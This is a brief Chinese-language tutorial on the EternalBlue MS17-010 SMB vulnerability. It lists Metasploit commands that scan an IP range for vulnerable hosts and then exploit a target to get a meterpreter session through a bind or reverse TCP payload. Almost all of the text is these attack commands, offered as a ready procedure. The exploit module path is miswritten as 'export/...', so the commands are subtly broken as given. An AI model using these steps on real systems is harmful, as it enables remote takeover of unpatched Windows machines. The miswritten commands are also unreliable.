前言
永恒之蓝(英语:EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的档案分享协议的漏洞进行散播。维基百科
ms漏洞编号ms17-010
查点
<ip_list>:指定IP网段
192.168.1.0-255、192.168.1.0/32
<num>:定义线程数
1
2
3
4
5
6
7
| msfconsole
msf > search ms17_010
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS <ip_list>
msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS <num>
msf auxiliary(scanner/smb/smb_ms17_010) > run
|
漏洞利用
<ip_target>:目标IP地址
正向连接
1
2
3
4
5
| msfconsole
msf > use export/windows/smb/ms17_010_eternalblue
msf export(smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/bind_tcp
msf export(smb/ms17_010_eternalblue) > set RHOSTS <ip_target>
msf export(smb/ms17_010_eternalblue) > run
|
反向连接
1
2
3
4
5
| msfconsole
msf > use export/windows/smb/ms17_010_eternalblue
msf export(smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf export(smb/ms17_010_eternalblue) > set RHOSTS <ip_target>
msf export(smb/ms17_010_eternalblue) > run
|
完成
参考文献
知乎——周毅刚
哔哩哔哩——千锋教育网络安全学院
51CTO公开课——陈鑫杰
哔哩哔哩——千锋教育网络安全学院